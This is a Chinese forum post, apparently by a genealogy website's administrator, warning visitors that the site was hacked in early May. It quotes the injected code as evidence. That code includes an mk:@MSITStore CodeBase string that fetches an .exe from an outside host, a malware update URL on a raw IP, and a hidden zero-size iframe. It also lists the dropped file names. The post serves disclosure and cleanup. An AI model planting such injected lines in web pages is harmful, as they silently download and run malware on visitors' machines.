欢迎注册登录后浏览更多内容!谢谢!
您需要 登录 才可以下载或查看,没有帐号?注册
x
据守信、小达报道:5月4日以后,我们网站出现了木马病毒,5月6号回来后,我立刻展开了调查,事情如下:
1、病毒为骇客类,侵入了网站修改了网页代码,在网页上加上了如下代码: CodeBase: mk:%40MSITStore%3Amhtml%3Ac%3A\%2Emht%21http://bbs.gemeus.com/q17%2f1.js::/%23.exe
CLSID: {00000000-0000-0000-0000-000000000000}
Extension:
Type: application/x-oleobject
也就是说,捣鬼的网站是http://bbs.gemeus.com/q17%2f1.js::/%23.exe
捣鬼的文件是q17%2f1.js::/%23.exe
2、经过查看临时文件夹,木马病毒将病毒文件寄放在临时文件夹下,妄想运行时,被我的天网防火墙阻止了。在临时文件夹下的几个文件名是:
1.exe
1.js
ah.js
CAY9GX8D.HTM
setup_jt.exe.txt
3、如果大家用三个热键查看进程,其中有上述文件,请结束进程,杀毒。
4、记得病毒当时提示,要把网上文件下载到windows目录下的Downloaded Program Files进行安装,其文件名为:#.exe
5、[update]
num=22
url=http://222.88.88.191/setup_jt.exe
这是病毒更新文件
6、如果5月4号到7号间曾打开过袁氏家谱网站或论坛的朋友,请杀毒。
7、这家伙在我网页尾加上了这样的语句:
<iframe src="http://bbs.gemeus.com/q17/index.htm"width="0" height="0"></iframe>
弹出一个窗口,其内容指向这个论坛。
----这是很不道德的宣传自己论坛的做法。人皆诛之。 |